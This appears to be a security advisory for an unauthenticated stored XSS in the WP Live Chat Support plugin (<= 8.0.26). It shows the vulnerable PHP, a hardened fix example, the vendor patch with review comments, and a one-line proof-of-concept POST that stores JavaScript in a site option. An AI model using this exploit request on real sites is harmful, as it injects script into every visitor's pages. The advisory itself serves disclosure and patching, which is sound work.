
WP Live Chat Support <= 8.0.26 - Unauthenticated Stored XSS

Summary

Name: WP Live Chat Support <= 8.0.26 - Unauthenticated Stored XSS
Summary: An unauthenticated user can store a malicious JavaScript snippet in WordPress, which is then executed on every visitor's page load. This version also has an XSS vulnerability in modules/gdpr.php.
Affected application: wp-live-chat-support
Affected revision: <= 8.0.26
Vendor update available: Yes
CVE:
Ids: CWE-79
CVSSv3.0 Base Score: 5.8
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Public Exploit available: Yes
Exploit verified: Yes
Authentication Required: No

Vulnerable Code

<?php
## wp-live-chat-support.php

// lines 205-209: the head hook is registered on admin_init
if (function_exists('wplc_head_pro')) {
    add_action('admin_init', 'wplc_head_pro');
} else {
    add_action('admin_init', 'wplc_head_basic');
}

/* The code never checks whether the request comes from an administrator. */
/* admin_init fires for any request to admin-ajax.php or admin-post.php, including
   unauthenticated ones, so the chain below can update the option WPLC_CUSTOM_JS. */

// lines 4292-4295: wplc_head_basic() fires the hook that reaches the save routine
function wplc_head_basic() {
    global $wpdb;

    do_action("wplc_hook_head");
    // (rest of the function is not shown on this page)
}

// lines 5727-5747: the save routine trusts $_POST with no capability or nonce check
add_action( "wplc_hook_head", "wplc_custom_scripts_save" );
/**
 * Saves the custom scripts into the options table
 * @return void
 */
function wplc_custom_scripts_save(){

        if( isset( $_POST['wplc_save_settings'] ) ){

                if( isset( $_POST['wplc_custom_css'] ) ){
                        update_option( "WPLC_CUSTOM_CSS", nl2br( $_POST['wplc_custom_css'] ) );
                }

                if( isset( $_POST['wplc_custom_js'] ) ){
                        update_option( "WPLC_CUSTOM_JS", nl2br( $_POST['wplc_custom_js'] ) );
                }

        }

}
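
The fix pattern that the vendor patch applies, written out as one complete handler. This is an added example, not code from the plugin or its vendor: it assumes the standard WordPress plugin API (admin_post_* actions, check_admin_referer, current_user_can, update_option, wp_nonce_field) and uses a hypothetical action name wplc_example_save_scripts, nonce action wplc_example_save_scripts_nonce and settings page slug. It goes beyond the patch in three ways: the save runs on a dedicated admin-post action instead of on every admin_init, a nonce is verified so a logged-in administrator cannot be tricked into saving scripts by a forged request, and the JS field is accepted only from users holding unfiltered_html (on multisite, manage_options alone does not grant that). The nl2br() call of the original is dropped, since it injects <br /> markup into stored JavaScript; the wp_unslash() calls undo the slashes WordPress adds to $_POST (visible as alert(\'xss\') in the wp option output above).

```php
<?php
// Added example (not the plugin's code). Hardened replacement for the
// save path shown above. Assumes the WordPress plugin API is loaded.

// Register the handler on a dedicated admin-post action, so it runs only
// when the form posts action=wplc_example_save_scripts (hypothetical name),
// not on every admin_init, which also fires for admin-ajax.php / admin-post.php.
add_action( 'admin_post_wplc_example_save_scripts', 'wplc_example_save_scripts' );

/**
 * Saves custom CSS/JS into the options table, but only for a request that
 * (1) carries a valid nonce, (2) comes from a user who may manage options,
 * and (3) for the JS field, comes from a user allowed to store raw markup.
 */
function wplc_example_save_scripts() {
    // Nonce check: blocks cross-site request forgery against a logged-in admin.
    // check_admin_referer() calls wp_die() itself when the nonce is missing or stale.
    check_admin_referer( 'wplc_example_save_scripts_nonce' );

    // Capability check: the defect in <= 8.0.26 was the absence of this.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You do not have permission to perform this action', 'wplivechat' ), 403 );
    }

    if ( isset( $_POST['wplc_custom_css'] ) ) {
        // CSS is plain text; wp_strip_all_tags() removes any markup a
        // manage_options user without unfiltered_html might try to smuggle in.
        $css = wp_strip_all_tags( wp_unslash( $_POST['wplc_custom_css'] ) );
        update_option( 'WPLC_CUSTOM_CSS', $css );
    }

    if ( isset( $_POST['wplc_custom_js'] ) ) {
        // Raw JavaScript runs for every visitor, so it is gated on the same
        // capability core uses for raw markup. On multisite only super admins hold it.
        if ( ! current_user_can( 'unfiltered_html' ) ) {
            wp_die( esc_html__( 'Storing custom JavaScript requires the unfiltered_html capability', 'wplivechat' ), 403 );
        }
        update_option( 'WPLC_CUSTOM_JS', wp_unslash( $_POST['wplc_custom_js'] ) );
    }

    // Send the admin back to the settings page (page slug is hypothetical).
    wp_safe_redirect( add_query_arg( 'settings-updated', 'true', admin_url( 'admin.php?page=wplc-example-settings' ) ) );
    exit;
}

/**
 * Renders the settings form with the matching nonce and action field.
 * The form posts to admin-post.php; WordPress dispatches to the action above.
 * Output is escaped so a previously stored value cannot execute on this page.
 */
function wplc_example_render_form() {
    $css = get_option( 'WPLC_CUSTOM_CSS', '' );
    $js  = get_option( 'WPLC_CUSTOM_JS', '' );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <?php wp_nonce_field( 'wplc_example_save_scripts_nonce' ); ?>
        <input type="hidden" name="action" value="wplc_example_save_scripts">
        <textarea name="wplc_custom_css"><?php echo esc_textarea( $css ); ?></textarea>
        <textarea name="wplc_custom_js"><?php echo esc_textarea( $js ); ?></textarea>
        <?php submit_button( __( 'Save', 'wplivechat' ) ); ?>
    </form>
    <?php
}
```

With this layout an unauthenticated POST to admin-post.php with action=wplc_example_save_scripts is rejected by check_admin_referer() before any option is touched, and a POST without that action field never reaches the handler at all, because nothing is hooked on admin_init.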

Exploit:

$ http -v --form http://wplivechat.vulnsite.xxyy/wp-admin/admin-post.php wplc_custom_js="alert('xss')" wplc_save_settings=1
$ wp option get WPLC_CUSTOM_JS
alert(\'xss\')

Exploit Methodology

To exploit this vulnerability the attacker has to do the following:

  • Submit malicious JS in an unauthenticated POST, which updates the WP option WPLC_CUSTOM_JS
  • Every visitor to the website then runs the malicious JS

Security Patch

diff --git a/wp-content/plugins/wp-live-chat-support/modules/gdpr.php b/wp-content/plugins/wp-live-chat-support/modules/gdpr.php
index b039a06..96df18b 100644
--- a/wp-content/plugins/wp-live-chat-support/modules/gdpr.php
+++ b/wp-content/plugins/wp-live-chat-support/modules/gdpr.php
@@ -247,6 +247,7 @@ add_action('wplc_gdpr_page_process_actions_hook', 'wplc_gdpr_page_process_action
  * Handles the magic processing of the GDPR page
 */
 function wplc_gdpr_page_process_actions(){
+ if (current_user_can('export')) {
   if(isset($_GET['action']) && isset($_GET['filter']) && isset($_GET['id'])){
     $action = sanitize_text_field($_GET['action']);
     $filter = sanitize_text_field($_GET['filter']);
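Review bot: the new `if (current_user_can('export'))` guard leaves the GET-driven action handling without a nonce check; `$_GET['action']`, `$_GET['filter']` and `$_GET['id']` are read and acted on with only a capability test, so a user who holds `export` can be made to trigger the export or download by following a forged link. Add a `check_admin_referer()` call (action name of your choosing) before the `isset()` block and build the GDPR page links with `wp_nonce_url()`. Note also that the opening brace of the new `if` is closed only in the following hunk, so the two hunks must land together.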
@@ -258,6 +259,9 @@ function wplc_gdpr_page_process_actions(){
       wplc_gdpr_download_chat($filter, $id);
     }
   }
+ } else {
+  wp_die(__("You do not have permission do perform this action", "wplivechat"));
+ }
 }

 /**
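Review bot: the message string has a typo, "permission do perform" should read "permission to perform"; the identical string appears in the wp-live-chat-support.php hunk, so fix both or move it into one shared translatable string. Beyond wording, because the capability check now wraps the entire function body, any user without `export` who reaches this hook is met with `wp_die()` even when no `action`/`filter`/`id` parameters are present; placing the check inside the `isset()` condition, or returning instead of dying when no action was requested, keeps an ordinary page load from becoming a fatal response.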
diff --git a/wp-content/plugins/wp-live-chat-support/wp-live-chat-support.php b/wp-content/plugins/wp-live-chat-support/wp-live-chat-support.php
index 74323aa..10e229d 100644
--- a/wp-content/plugins/wp-live-chat-support/wp-live-chat-support.php
+++ b/wp-content/plugins/wp-live-chat-support/wp-live-chat-support.php
@@ -5733,7 +5733,7 @@ add_action( "wplc_hook_head", "wplc_custom_scripts_save" );
 function wplc_custom_scripts_save(){

    if( isset( $_POST['wplc_save_settings'] ) ){
-
+       if (current_user_can('manage_options')) {
        if( isset( $_POST['wplc_custom_css'] ) ){
            update_option( "WPLC_CUSTOM_CSS", nl2br( $_POST['wplc_custom_css'] ) );
        }
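Review bot: `current_user_can('manage_options')` closes the unauthenticated path, but the handler still runs on every `admin_init` and still has no nonce verification, so an administrator who opens a crafted page can be made to submit `wplc_save_settings` with attacker-chosen CSS/JS, reaching the same stored XSS via CSRF. Add `check_admin_referer()` here with a matching `wp_nonce_field()` in the settings form, or move the save to a dedicated `admin_post_<action>` hook. The CSS value is also still stored with only `nl2br()` applied: run it through `wp_unslash()` (WordPress adds slashes to `$_POST`, which is why the stored value on this page reads `alert(\'xss\')`), and consider `wp_strip_all_tags()`, since CSS should never contain markup.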
@@ -5741,7 +5741,9 @@ function wplc_custom_scripts_save(){
        if( isset( $_POST['wplc_custom_js'] ) ){
            update_option( "WPLC_CUSTOM_JS", nl2br( $_POST['wplc_custom_js'] ) );
        }
-
+       } else {
+       wp_die(__("You do not have permission do perform this action", "wplivechat"));
+      }
    }

 }
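Review bot: same "do perform" typo as in gdpr.php. The added `} else {` and its closing `}` are indented differently from the `if (current_user_can(...))` they belong to (6 spaces against 7), which makes the nesting hard to follow in a block that already mixes tabs and spaces; align them with the `if`. Substantively, the JS branch now stores raw script behind `manage_options` alone; on multisite, site administrators hold `manage_options` but not `unfiltered_html`, so this gate lets them store executable content that core itself would strip from them. Gate the `WPLC_CUSTOM_JS` write on `current_user_can('unfiltered_html')`.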

References

Sucuri